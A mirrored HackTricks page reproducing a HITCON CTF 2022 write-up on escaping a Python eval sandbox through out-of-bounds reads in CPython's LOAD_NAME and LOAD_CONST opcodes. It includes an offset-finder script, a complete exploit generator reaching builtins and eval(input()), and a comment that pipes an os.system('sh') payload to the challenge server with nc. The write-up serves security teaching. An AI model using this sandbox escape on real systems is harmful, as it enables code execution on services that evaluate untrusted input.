mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
258 lines
11 KiB
Markdown
258 lines
11 KiB
Markdown
|
# LOAD\_NAME / LOAD\_CONST opcode OOB Read
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
**This info was taken** [**from this writeup**](https://blog.splitline.tw/hitcon-ctf-2022/)**.**
|
||
|
|
||
|
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
|
||
|
|
||
|
We can use OOB read feature in LOAD\_NAME / LOAD\_CONST opcode to get some symbol in the memory. Which means using trick like `(a, b, c, ... hundreds of symbol ..., __getattribute__) if [] else [].__getattribute__(...)` to get a symbol (such as function name) you want.
|
||
|
|
||
|
Then just craft your exploit.
|
||
|
|
||
|
### Overview <a href="#overview-1" id="overview-1"></a>
|
||
|
|
||
|
The source code is pretty short, only contains 4 lines!
|
||
|
|
||
|
```python
|
||
|
source = input('>>> ')
|
||
|
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
|
||
|
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
|
||
|
print(eval(code, {'__builtins__': {}}))1234
|
||
|
```
|
||
|
|
||
|
You can input arbitrary Python code, and it'll be compiled to a [Python code object](https://docs.python.org/3/c-api/code.html). However `co_consts` and `co_names` of that code object will be replaced with an empty tuple before eval that code object.
|
||
|
|
||
|
So in this way, all the expression contains consts (e.g. numbers, strings etc.) or names (e.g. variables, functions) might cause segmentation fault in the end.
|
||
|
|
||
|
### Out of Bound Read <a href="#out-of-bound-read" id="out-of-bound-read"></a>
|
||
|
|
||
|
How does the segfault happen?
|
||
|
|
||
|
Let's start with a simple example, `[a, b, c]` could compile into the following bytecode.
|
||
|
|
||
|
```
|
||
|
1 0 LOAD_NAME 0 (a)
|
||
|
2 LOAD_NAME 1 (b)
|
||
|
4 LOAD_NAME 2 (c)
|
||
|
6 BUILD_LIST 3
|
||
|
8 RETURN_VALUE12345
|
||
|
```
|
||
|
|
||
|
But what if the `co_names` become empty tuple? The `LOAD_NAME 2` opcode is still executed, and try to read value from that memory address it originally should be. Yes, this is an out-of-bound read "feature".
|
||
|
|
||
|
The core concept for the solution is simple. Some opcodes in CPython for example `LOAD_NAME` and `LOAD_CONST` are vulnerable (?) to OOB read.
|
||
|
|
||
|
They retrieve an object from index `oparg` from the `consts` or `names` tuple (that's what `co_consts` and `co_names` named under the hood). We can refer to the following short snippest about `LOAD_CONST` to see what CPython does when it proccesses to `LOAD_CONST` opcode.
|
||
|
|
||
|
```c
|
||
|
case TARGET(LOAD_CONST): {
|
||
|
PREDICTED(LOAD_CONST);
|
||
|
PyObject *value = GETITEM(consts, oparg);
|
||
|
Py_INCREF(value);
|
||
|
PUSH(value);
|
||
|
FAST_DISPATCH();
|
||
|
}1234567
|
||
|
```
|
||
|
|
||
|
In this way we can use the OOB feature to get a "name" from arbitrary memory offset. To make sure what name it has and what's it's offset, just keep trying `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... And you could find something in about oparg > 700. You can also try to use gdb to take a look at the memory layout of course, but I don't think it would be more easier?
|
||
|
|
||
|
### Generating the Exploit <a href="#generating-the-exploit" id="generating-the-exploit"></a>
|
||
|
|
||
|
Once we retrieve those useful offsets for names / consts, how _do_ we get a name / const from that offset and use it? Here is a trick for you:\
|
||
|
Let's assume we can get a `__getattribute__` name from offset 5 (`LOAD_NAME 5`) with `co_names=()`, then just do the following stuff:
|
||
|
|
||
|
```python
|
||
|
[a,b,c,d,e,__getattribute__] if [] else [
|
||
|
[].__getattribute__
|
||
|
# you can get the __getattribute__ method of list object now!
|
||
|
]1234
|
||
|
```
|
||
|
|
||
|
> Notice that it is not necessary to name it as `__getattribute__`, you can name it as something shorter or more weird
|
||
|
|
||
|
You can understand the reason behind by just viewing it's bytecode:
|
||
|
|
||
|
```python
|
||
|
0 BUILD_LIST 0
|
||
|
2 POP_JUMP_IF_FALSE 20
|
||
|
>> 4 LOAD_NAME 0 (a)
|
||
|
>> 6 LOAD_NAME 1 (b)
|
||
|
>> 8 LOAD_NAME 2 (c)
|
||
|
>> 10 LOAD_NAME 3 (d)
|
||
|
>> 12 LOAD_NAME 4 (e)
|
||
|
>> 14 LOAD_NAME 5 (__getattribute__)
|
||
|
16 BUILD_LIST 6
|
||
|
18 RETURN_VALUE
|
||
|
20 BUILD_LIST 0
|
||
|
>> 22 LOAD_ATTR 5 (__getattribute__)
|
||
|
24 BUILD_LIST 1
|
||
|
26 RETURN_VALUE1234567891011121314
|
||
|
```
|
||
|
|
||
|
Notice that `LOAD_ATTR` also retrieve the name from `co_names`. Python loads names from the same offset if the name is the same, so the second `__getattribute__` is still loaded from offset=5. Using this feature we can use arbitrary name once the name is in the memory nearby.
|
||
|
|
||
|
For generating numbers should be trivial:
|
||
|
|
||
|
* 0: not \[\[]]
|
||
|
* 1: not \[]
|
||
|
* 2: (not \[]) + (not \[])
|
||
|
* ...
|
||
|
|
||
|
### Exploit Script <a href="#exploit-script-1" id="exploit-script-1"></a>
|
||
|
|
||
|
I didn't use consts due to the length limit.
|
||
|
|
||
|
First here is a script for us to find those offsets of names.
|
||
|
|
||
|
```python
|
||
|
from types import CodeType
|
||
|
from opcode import opmap
|
||
|
from sys import argv
|
||
|
|
||
|
|
||
|
class MockBuiltins(dict):
|
||
|
def __getitem__(self, k):
|
||
|
if type(k) == str:
|
||
|
return k
|
||
|
|
||
|
|
||
|
if __name__ == '__main__':
|
||
|
n = int(argv[1])
|
||
|
|
||
|
code = [
|
||
|
*([opmap['EXTENDED_ARG'], n // 256]
|
||
|
if n // 256 != 0 else []),
|
||
|
opmap['LOAD_NAME'], n % 256,
|
||
|
opmap['RETURN_VALUE'], 0
|
||
|
]
|
||
|
|
||
|
c = CodeType(
|
||
|
0, 0, 0, 0, 0, 0,
|
||
|
bytes(code),
|
||
|
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
|
||
|
)
|
||
|
|
||
|
ret = eval(c, {'__builtins__': MockBuiltins()})
|
||
|
if ret:
|
||
|
print(f'{n}: {ret}')
|
||
|
|
||
|
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
|
||
|
```
|
||
|
|
||
|
And the following is for generating the real Python exploit.
|
||
|
|
||
|
```python
|
||
|
import sys
|
||
|
import unicodedata
|
||
|
|
||
|
|
||
|
class Generator:
|
||
|
# get numner
|
||
|
def __call__(self, num):
|
||
|
if num == 0:
|
||
|
return '(not[[]])'
|
||
|
return '(' + ('(not[])+' * num)[:-1] + ')'
|
||
|
|
||
|
# get string
|
||
|
def __getattribute__(self, name):
|
||
|
try:
|
||
|
offset = None.__dir__().index(name)
|
||
|
return f'keys[{self(offset)}]'
|
||
|
except ValueError:
|
||
|
offset = None.__class__.__dir__(None.__class__).index(name)
|
||
|
return f'keys2[{self(offset)}]'
|
||
|
|
||
|
|
||
|
_ = Generator()
|
||
|
|
||
|
names = []
|
||
|
chr_code = 0
|
||
|
for x in range(4700):
|
||
|
while True:
|
||
|
chr_code += 1
|
||
|
char = unicodedata.normalize('NFKC', chr(chr_code))
|
||
|
if char.isidentifier() and char not in names:
|
||
|
names.append(char)
|
||
|
break
|
||
|
|
||
|
offsets = {
|
||
|
"__delitem__": 2800,
|
||
|
"__getattribute__": 2850,
|
||
|
'__dir__': 4693,
|
||
|
'__repr__': 2128,
|
||
|
}
|
||
|
|
||
|
variables = ('keys', 'keys2', 'None_', 'NoneType',
|
||
|
'm_repr', 'globals', 'builtins',)
|
||
|
|
||
|
for name, offset in offsets.items():
|
||
|
names[offset] = name
|
||
|
|
||
|
for i, var in enumerate(variables):
|
||
|
assert var not in offsets
|
||
|
names[792 + i] = var
|
||
|
|
||
|
|
||
|
source = f'''[
|
||
|
({",".join(names)}) if [] else [],
|
||
|
None_ := [[]].__delitem__({_(0)}),
|
||
|
keys := None_.__dir__(),
|
||
|
NoneType := None_.__getattribute__({_.__class__}),
|
||
|
keys2 := NoneType.__dir__(NoneType),
|
||
|
get := NoneType.__getattribute__,
|
||
|
m_repr := get(
|
||
|
get(get([],{_.__class__}),{_.__base__}),
|
||
|
{_.__subclasses__}
|
||
|
)()[-{_(2)}].__repr__,
|
||
|
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
|
||
|
builtins := globals[[*globals][{_(7)}]],
|
||
|
builtins[[*builtins][{_(19)}]](
|
||
|
builtins[[*builtins][{_(28)}]](), builtins
|
||
|
)
|
||
|
]'''.strip().replace('\n', '').replace(' ', '')
|
||
|
|
||
|
print(f"{len(source) = }", file=sys.stderr)
|
||
|
print(source)
|
||
|
|
||
|
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
|
||
|
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
|
||
|
```
|
||
|
|
||
|
It basically does the following things, for those strings we get it from the `__dir__` method:
|
||
|
|
||
|
```python
|
||
|
getattr = (None).__getattribute__('__class__').__getattribute__
|
||
|
builtins = getattr(
|
||
|
getattr(
|
||
|
getattr(
|
||
|
[].__getattribute__('__class__'),
|
||
|
'__base__'),
|
||
|
'__subclasses__'
|
||
|
)()[-2],
|
||
|
'__repr__').__getattribute__('__globals__')['builtins']
|
||
|
builtins['eval'](builtins['input']())
|
||
|
```
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|